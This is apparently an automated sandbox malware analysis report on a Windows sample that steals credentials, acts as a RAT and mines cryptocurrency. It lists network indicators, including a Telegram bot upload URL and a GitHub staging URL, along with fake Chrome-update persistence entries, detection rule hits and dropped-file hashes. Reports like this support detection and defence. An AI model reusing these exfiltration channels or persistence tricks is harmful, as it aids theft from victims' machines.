                                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.sqlite.org/copyright.html2s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                            high
                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyhacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://system.data.sqlite.org/s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemain.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://api.telegram.org/bot-/sendDocument?chat_id=main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                    high
                                                                    https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syhacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663621476.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663803211.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663944148.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.sqlite.org/copyright.htmlmain.exefalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        208.95.112.1
                                                                        ip-api.comUnited States
                                                                        53334TUT-ASUSfalse
                                                                        185.199.111.133
                                                                        raw.githubusercontent.comNetherlands
                                                                        54113FASTLYUSfalse
                                                                        142.202.242.43
                                                                        unknownReserved
                                                                        143151GSERVERSUSfalse
                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                        Analysis ID:1401452
                                                                        Start date and time:2024-03-01 15:21:07 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 11m 20s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:52
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:6
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:hacn.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.mine.winEXE@78/35@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 78.6%
                                                                        HCA Information:
                                                                        • Successful, ratio: 54%
                                                                        • Number of executed functions: 190
                                                                        • Number of non-executed functions: 245
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): Conhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                                                        • Excluded IPs from analysis (whitelisted): 20.114.59.183, 72.21.81.240, 52.165.164.15, 13.85.23.206, 20.190.190.195, 20.190.190.131, 20.190.190.193, 20.190.190.132, 40.126.62.129, 20.190.190.129, 40.126.62.131, 40.126.62.132
                                                                        • Excluded domains from analysis (whitelisted): google.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, api.telegram.org, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                        • Execution Graph export aborted for target hacn.exe, PID 7588 because there are no executed function
                                                                        • Execution Graph export aborted for target setup.exe, PID 7768 because it is empty
                                                                        • Execution Graph export aborted for target updater.exe, PID 1436 because it is empty
                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • VT rate limit hit for: hacn.exe
                                                                        TimeTypeDescription
                                                                        14:22:04Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
                                                                        14:22:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                        14:22:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                        15:21:58API Interceptor1x Sleep call for process: setup.exe modified
                                                                        15:21:59API Interceptor40x Sleep call for process: powershell.exe modified
                                                                        15:22:00API Interceptor45x Sleep call for process: main.exe modified
                                                                        15:22:03API Interceptor1x Sleep call for process: updater.exe modified
                                                                        15:22:35API Interceptor306143x Sleep call for process: winlogon.exe modified
                                                                        15:22:37API Interceptor230672x Sleep call for process: lsass.exe modified
                                                                        15:22:37API Interceptor669x Sleep call for process: svchost.exe modified
                                                                        15:22:40API Interceptor276939x Sleep call for process: dwm.exe modified
                                                                        15:22:51API Interceptor1372x Sleep call for process: dialer.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        208.95.112.1RFQ_C3682402292141.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        SecuriteInfo.com.Trojan.PackedNET.2722.8886.30772.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        RFQ.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        6100853601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        P2P-Q-2401-001.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        NEW QUOTE-- 002177700XXXXX024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Order 72005918536.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        NEW QUOTE-- 002177700XXXXX024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        doc20242902025126.imgGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        SecuriteInfo.com.FileRepMalware.31003.15058.exeGet hashmaliciousPython StealerBrowse
                                                                        • ip-api.com/json/?fields=8195
                                                                        185.199.111.133Excel2PPT.xlsmGet hashmaliciousUnknownBrowse
                                                                          https://mirror.accuris.caGet hashmaliciousUnknownBrowse
                                                                            https://github.com/maurice-daly/DriverAutomationTool/tree/master/Current%20Branch/7.2.3Get hashmaliciousUnknownBrowse
                                                                              https://github.com/martinvonz/jj/releases/download/v0.14.0/jj-v0.14.0-x86_64-pc-windows-msvc.zipGet hashmaliciousUnknownBrowse
                                                                                https://kembaliketarifnormal-6500bni.pages.dev/IP:Get hashmaliciousHTMLPhisherBrowse
                                                                                  https://www.canva.com/design/DAF-AKdx1iQ/gxF6_iQ8jJGpA-rLPIarSw/view?utm_content=DAF-AKdx1iQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                    SecuriteInfo.com.FileRepMalware.12702.1729.exeGet hashmaliciousUnknownBrowse
                                                                                      SecuriteInfo.com.FileRepMalware.12702.1729.exeGet hashmaliciousUnknownBrowse
                                                                                        https://konfirmasi-tarif-bnl-2024.info-danna.bio/Get hashmaliciousUnknownBrowse
                                                                                          https://www.canva.com/design/DAF9ieWTRUA/qd9fhkO_FE-gSZCqgu9EwQ/view?utm_coGet hashmaliciousUnknownBrowse
                                                                                            142.202.242.43LUFkhhOJGJ.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                                                                              FV0mIIfKwQ.exeGet hashmaliciousAmadey, RisePro Stealer, SmokeLoader, StealcBrowse
                                                                                                AffoeAIM.exeGet hashmaliciousPureLog Stealer, XmrigBrowse
                                                                                                  FxeLOSQQNf.exeGet hashmaliciousXmrigBrowse
                                                                                                    AvzR5wP0YM.exeGet hashmaliciousXmrigBrowse
                                                                                                      1FTe3IQdAZ.exeGet hashmaliciousXmrigBrowse
                                                                                                        Bbd9GbGTz6.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, XmrigBrowse
                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.11847.1098.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, XmrigBrowse
                                                                                                            MdO7pWHaxQ.exeGet hashmaliciousLummaC, Amadey, Fabookie, Glupteba, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                              RGAVGSoWvM.exeGet hashmaliciousLummaC, Amadey, PureLog Stealer, RedLine, Stealc, Xmrig, zgRATBrowse
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                raw.githubusercontent.comExcel2PPT.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://flow.page/protected__file0Get hashmaliciousUnknownBrowse
                                                                                                                • 185.199.108.133
                                                                                                                https://github.com/maurice-daly/DriverAutomationTool/tree/master/Current%20Branch/7.2.3Get hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://kembaliketarifnormal-6500bni.pages.dev/IP:Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 185.199.111.133
                                                                                                                SecuriteInfo.com.FileRepMalware.29389.28556.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.108.133
                                                                                                                SecuriteInfo.com.FileRepMalware.29389.28556.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.108.133
                                                                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, RedLine, RisePro StealerBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://bank-bni.perubahantarif.uk/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 185.199.108.133
                                                                                                                SecuriteInfo.com.FileRepMalware.12702.1729.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                SecuriteInfo.com.FileRepMalware.12702.1729.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                pool.hashvault.proFwaFVifk8s.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 142.202.242.43
                                                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                LUFkhhOJGJ.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                W1nnerFree CS2.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                AffoeAIM.exeGet hashmaliciousPureLog Stealer, XmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                FxeLOSQQNf.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                AvzR5wP0YM.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 142.202.242.43
                                                                                                                1FTe3IQdAZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 142.202.242.43
                                                                                                                Bbd9GbGTz6.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, XmrigBrowse
                                                                                                                • 142.202.242.43
                                                                                                                SecuriteInfo.com.Win32.PWSX-gen.11847.1098.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, XmrigBrowse
                                                                                                                • 142.202.242.43
                                                                                                                ip-api.comRFQ_C3682402292141.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                SecuriteInfo.com.Trojan.PackedNET.2722.8886.30772.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                RFQ.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                6100853601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                http://4837489289293032093930290390239203fjdhdfjkj3o939020923090932.kovacscorers.comGet hashmaliciousPhisherBrowse
                                                                                                                • 38.91.101.241
                                                                                                                P2P-Q-2401-001.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                NEW QUOTE-- 002177700XXXXX024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Order 72005918536.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                NEW QUOTE-- 002177700XXXXX024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                doc20242902025126.imgGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                FASTLYUSPhoenix5b.ipaGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.195.6
                                                                                                                https://hastebin.com/share/ogamarelir.xmlGet hashmaliciousNTLM Hash StealerBrowse
                                                                                                                • 199.232.36.157
                                                                                                                https://advantecho365-my.sharepoint.com/:f:/g/personal/amanda_eriksen_advantech_com/EpP8vYfyU_RBi6SdtjWUdQQBIRJulWRqRSHZIQe3X4fLjA?e=jQHC24Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 151.101.130.137
                                                                                                                Excel2PPT.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://gamma.app/docs/youve-a-new-docs-for-review-vgsyccn27n6jonpGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.129.140
                                                                                                                https://www.smore.com/n/s5npfGet hashmaliciousUnknownBrowse
                                                                                                                • 199.232.36.84
                                                                                                                _Btach81920_Payment_exka35_html.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 151.101.129.229
                                                                                                                https://acrobat.adobe.com/id/urn:aaid:sc:EU:119a0b26-1322-4f61-94de-30ab350fbf9cGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.66.49
                                                                                                                https://flow.page/protected__file0Get hashmaliciousUnknownBrowse
                                                                                                                • 151.101.130.208
                                                                                                                SecuriteInfo.com.Win32.TrojanX-gen.18566.17153.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 199.232.36.193
                                                                                                                TUT-ASUSRFQ_C3682402292141.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                SecuriteInfo.com.Trojan.PackedNET.2722.8886.30772.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                RFQ.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                6100853601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                P2P-Q-2401-001.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                NEW QUOTE-- 002177700XXXXX024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Order 72005918536.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                NEW QUOTE-- 002177700XXXXX024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                doc20242902025126.imgGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                SecuriteInfo.com.FileRepMalware.31003.15058.exeGet hashmaliciousPython StealerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                1GSERVERSUSJUSTIFICANTE DE PAGO PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 142.202.240.89
                                                                                                                FwaFVifk8s.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                LUFkhhOJGJ.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                                                                                                • 142.202.242.43
                                                                                                                transfer - 9783423-52323-248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 207.32.217.188
                                                                                                                Factura para el pago 07848956897.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 207.32.217.188
                                                                                                                W1nnerFree CS2.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                                                                • 142.202.242.45
                                                                                                                pago-02-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 142.202.240.89
                                                                                                                FV0mIIfKwQ.exeGet hashmaliciousAmadey, RisePro Stealer, SmokeLoader, StealcBrowse
                                                                                                                • 142.202.242.43
                                                                                                                AffoeAIM.exeGet hashmaliciousPureLog Stealer, XmrigBrowse
                                                                                                                • 142.202.242.43
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eTEL_147051470514705RECHNUNG_14705.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                • 185.199.111.133
                                                                                                                CORRECTION_FORM_CF1_txt.lnk.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                • 185.199.111.133
                                                                                                                ShareGate.24.2.3.msiGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                5567890333.wsfGet hashmaliciousXWormBrowse
                                                                                                                • 185.199.111.133
                                                                                                                RFQ.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 185.199.111.133
                                                                                                                6100853601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://prezi.com/i/view/LuKHYK7cLAwaQgyih2E9Get hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                bc car seat laws 2954.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                bc car seat laws 2954.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://admortonco-my.sharepoint.com/:f:/p/chris/Eqm6Y75QIl1CrUSFMrfbwLABZUl5hkjU4nihAZ0iqeCvsQ?e=ydgOgSGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 185.199.111.133
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI75722\VCRUNTIME140.dllhttps://storage.googleapis.com/vectric_public/Cut2DDesktopTrialEdition_Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                  SecuriteInfo.com.Trojan.PWS.Stealer.38408.30550.27254.exeGet hashmaliciousUnknownBrowse
                                                                                                                    tts.exeGet hashmaliciousUnknownBrowse
                                                                                                                      SecuriteInfo.com.Python.Muldrop.25.8678.4056.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                        gG5vKnBFax.exeGet hashmaliciousUnknownBrowse
                                                                                                                          47YnqNpB7R.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            OPPVXcEaPW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                              SecuriteInfo.com.W64.S-8cfa6ebc.Eldorado.16653.18215.exeGet hashmaliciousUnknownBrowse
                                                                                                                                tOCTdBymcy.exeGet hashmaliciousDCRatBrowse
                                                                                                                                  PpQMwNh.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                    C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dllconhost.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                        Process:C:\ProgramData\setup.exe
                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5617152
                                                                                                                                        Entropy (8bit):7.71585644239634
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                                                        MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                        SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                                                        SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                                                        SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5872343
                                                                                                                                        Entropy (8bit):7.487098045911562
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciA
                                                                                                                                        MD5:DE8515E07D1C34FFF3C1DDD4FEE593FB
                                                                                                                                        SHA1:A27A35EC375BADC2B4C6AA73208DEF10B51DAC2D
                                                                                                                                        SHA-256:0DC68AE03B47614770A09DAFD37DA88B86358D09C6DF9D54AEC2A665F4972406
                                                                                                                                        SHA-512:3C2065D4F8D2DFF3819BBB34D1E77F6CE68884434258D2FD9893EAAAADA302B309E8E4E94EA0F9798145E6E3AAB850A2234AA1216896934BC03679F8A35C2A0F
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(....*..(....*..{....*"..}....*..*F.{....o....s....*...2...{....o..../..{.....o....*.s,...*...(....,.(........2...{....o....2..{.....o....*.{......o....*..s,...*v..(....,.(.......{.....o....*2.{....o....*...2...{....o....2..*.{.....o.....{.....o....*>.{.....o....&.*..0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5617152
                                                                                                                                        Entropy (8bit):7.71585644239634
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                                                        MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                        SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
